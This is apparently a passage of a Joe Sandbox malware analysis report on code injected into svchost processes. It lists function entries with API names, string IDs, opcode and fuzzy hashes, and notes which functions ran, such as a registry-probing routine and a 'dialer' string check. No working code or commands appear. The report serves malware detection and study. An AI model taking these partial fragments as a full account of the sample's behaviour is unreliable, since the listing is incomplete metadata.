                                                                                • API String ID: 3544855599-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: f049bdfa4467cedf291596ae25218e3f591c75243dbf1769f2e4c86082fcfec4
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: F8614737601A858AEB209FA5D8803FD77E1F344B98F089265EE4A57B99DB38C595C700
                                                                                Function 000001F28C1DA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 25aad5721677bc98cafa89319ea8e24db697cc3f84d272024727a276e12cc536
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: B5515C32180A82CEEB64CB2695843A97FE1F355BD4F18C226DB9987BD5CF38E491C701
                                                                                Function 000001F28C93AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 9177f0bf0d9df7804a9a46984ee0add15a62b848f9b6fecfe92ace9b6ae30fc5
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: 2B518F72140AC28AEB748BB59D843B977E0F354BE5F1CA265DA5947BD5CF38D860CB00
                                                                                Function 000001F28C1D8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: afc53225cc655b2fed49d42925427f3b528b099016d9c220d28cc2c64652b1ec
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 1D51AB32661A02CAFB18DB15E484BB93BE5F354BDCF518134DB1643B88EB78E841CB84
                                                                                Function 000001F28C1D83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: 5bb8fd39fd54a1bbbe4b45dd7fca3805f069a24c38516c4c1dc5b630a5076e57
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: C431BC72251B42D6F714DF12E884BA97BE8F740BC8F458124EF9A43B88DB38E941C784
                                                                                Function 000001F28C942058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction ID: c39e5784b660c4a4d2f64d18794380c2bf08d3c743fbeb2aeb89f9dd3d7ee852
                                                                                • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction Fuzzy Hash: E0D19A72B54E818AE711CBA9D4402FC7BF1F358BD8F1482A6DE5997B99DB34C506C340
                                                                                Function 000001F28C9314A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: 6a44d1e2dfff894d57fae1d393df2fad9fd7c7e601c52ccba1ddab5a2a16cdc8
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: 90014476640ED1DAE704EF66E9082AAA7E0F78CFC1F088435EA4A43729EF38C151C740
                                                                                Function 000001F28C942980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction ID: fc060a2a777751a54c3aac3ae4014f4932e9590c1f0470bfe82fe847ff4173f9
                                                                                • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction Fuzzy Hash: DD91CE72B50ED289FB64DF6594903FD3BE0B745BC8F1481A9DE0AA7A95DB34C482C700
                                                                                Function 000001F28C937960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: 96732df7916216e4dd4de8696d19f0f646e57f72df42aa736ed25244752b7042
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: B0111872790F428AEB008B70E8543B833A4F719798F441E35DA6D477A4EB78D2988380
                                                                                Function 000001F28C93253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: a81e46be2f1358104ca60f674bf27db7b8eb3ba3bc6c3102e371a9ccd66cc1d5
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: 1B719F36280FC286EB259F36A8483FA67D4F389BC4F582076DD0A53B9ADF35D6458700
                                                                                Function 000001F28C1D9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: ae7e25292b4b5205da875e4987803c657081cd892f163ddae90b46efd944a166
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: 7E613432A01B868AEB20DF69D4803ED7BA0F748BD8F144225EF4917B99DB78E595C740
                                                                                Function 000001F28C932330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction ID: 2488fe1737ff95e66ad044885111441f0c3a749c14707708a82aa8e704c637ae
                                                                                • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction Fuzzy Hash: B551C072284FC381EB649A3AA4583FAA7D1F3857C0F4D61B5DE5903B9ADB39C6058740
                                                                                Function 000001F28C9426F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: 2514762f6e10ab6845feae25dddec55dde5b08df4a5e13f98591cf2ab0d60153
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: 60418D72615E8186EB209F25E8443FAB7A0F798BD4F548171EE4E87798EB3CC541CB50
                                                                                Function 000001F28C9394A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: a1389ac8532826ac596aaee6b13d59646ba39f355e91e1ec56b6d169f0d5a3fa
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: 61112832214FC182EB618F25E4443A9B7E5FB88B94F598264EE8C07B69DF3CC595CB00
                                                                                Function 000001F28C1D7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 09633eca710365df152610dc5942b59f08b7406966c11a0154c1b9ae03bc6ca5
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: 09E086B1680F4690DF028F62E8802E837E0DB58BA4B489132DA5C47351FB7CD1E9C300
                                                                                Function 000001F28C1D73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 6f46bb36e99698124d87c0e4d324587b24abbfd4879edec8008199ce5951e68a
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 74E0E6B1651F45D4DF028F61E4901E877A5E758B94B889132DA5C47355EB78D1E5C300
                                                                                Function 000001F28C931BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: 4d82505500ce06d62ce877f2f89efa63fb9e64a04db03c9d2b6106834071bf2b
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: 67113A35641F8686EA54DB66A8082B967E1FB89FC0F1890B9DE4D57776EF38C442C300

                                                                                Executed Functions

                                                                                Function 000001CA9854328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000044.00000002.3310341405.000001CA98540000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA98540000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_68_2_1ca98540000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: 02608f7fb42785df329ad58013826795d5046dbf7aea57e8edc5433c45882f35
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: 021180746D4649C2FB669B39F90BFD923A4AF54B4DFD0412CA946825B1EF79C14CC203
                                                                                Function 000001CA98541ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000001CA98541628: GetProcessHeap.KERNEL32 ref: 000001CA98541633
                                                                                  • Part of subcall function 000001CA98541628: HeapAlloc.KERNEL32 ref: 000001CA98541642
                                                                                  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA985416B2
                                                                                  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA985416DF
                                                                                  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA985416F9
                                                                                  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA98541719
                                                                                  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA98541734
                                                                                  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA98541754
                                                                                  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA9854176F
                                                                                  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA9854178F
                                                                                  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA985417AA
                                                                                  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA985417CA
                                                                                • Sleep.KERNEL32 ref: 000001CA98541AD7
                                                                                • SleepEx.KERNELBASE ref: 000001CA98541ADD
                                                                                  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA985417E5
                                                                                  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA98541805
                                                                                  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA98541820
                                                                                  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA98541840
                                                                                  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA9854185B
                                                                                  • Part of subcall function 000001CA98541628: RegOpenKeyExW.ADVAPI32 ref: 000001CA9854187B
                                                                                  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA98541896
                                                                                  • Part of subcall function 000001CA98541628: RegCloseKey.ADVAPI32 ref: 000001CA985418A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000044.00000002.3310341405.000001CA98540000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA98540000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_68_2_1ca98540000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: e5877da068afd20c9cddd86298f94b34e7c121e501fc79df45c04bcb12845f54
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: 7B313E312D8649D1FF569B3ADA43BE923A8AF44FCCF8454218E0AC7695FE30C85DC212
                                                                                Function 000001CA98543844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 57 1ca98543844-1ca9854384f 58 1ca98543851-1ca98543864 StrCmpNIW 57->58 59 1ca98543869-1ca98543870 57->59 58->59 60 1ca98543866 58->60 60->59
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000044.00000002.3310341405.000001CA98540000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA98540000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_68_2_1ca98540000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: dialer
                                                                                • API String ID: 0-3528709123
                                                                                • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                • Instruction ID: 860d2abcd78385b5b6352b5b090ca42a6c42d302506dbb19178a9b524337b78a
                                                                                • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                • Instruction Fuzzy Hash: B4D05E753D2249C6FB569FAA88C6EE06350EF04B4CFC84034890002160DB39C98D9611
                                                                                Function 000001CA97FD273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000044.00000002.3310062832.000001CA97FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA97FD0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_68_2_1ca97fd0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: 819f76d9a5abc91c6e6eb48c3cbc51dee46eba0d1364d2a0c9ae9ef2f7337be7
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: B2614632B4129887EF15CF14C041BAD7BD2FB54B9CF988121CE1AA3788DB34D852D7A2

                                                                                Non-executed Functions

                                                                                Function 000001CA97FDF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000044.00000002.3310062832.000001CA97FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA97FD0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_68_2_1ca97fd0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: 14dcb86dd8f0441671da9dd4c2d17c6507bc951c5010396476c75a52142e6302
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: 6261C23268024C42FA67DB28E447FEE6EE0AF4175CFD44555CA2BB77A4EB34C841C222
                                                                                Function 000001CA97FD8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000044.00000002.3310062832.000001CA97FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA97FD0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_68_2_1ca97fd0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: d0b14945f8b4c0745365dd35961ac8a30c9a52f82823a91ee70ca9263ca45886
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: C651DE327412088AFB16CF15E406F993BE5FB50BACF918124DA07A3788EB34DC40C72A
                                                                                Function 000001CA97FD83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000044.00000002.3310062832.000001CA97FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA97FD0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_68_2_1ca97fd0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: bdce6d5c304d3e2db81985148f121619515b534cc9f314feddc33e8dc54f5cfd
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: BB31AF322416489AF716DF15E846F993BA5FF40B9CF858014EE5BA3784DB38D940C72A
                                                                                Function 000001CA97FD9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000044.00000002.3310062832.000001CA97FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA97FD0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_68_2_1ca97fd0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: ca70dbbd545fe2c05a366975a8c2cf549e4bf70a6ec871fb258b060c3f0cd3d6
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: 89616833604A888AFB22DFA5D481BDD7BA0FB48B8CF444215EE4A67B98DB38D455C711
                                                                                Function 000001CA97FD7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000044.00000002.3310062832.000001CA97FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA97FD0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_68_2_1ca97fd0000_svchost.jbxd
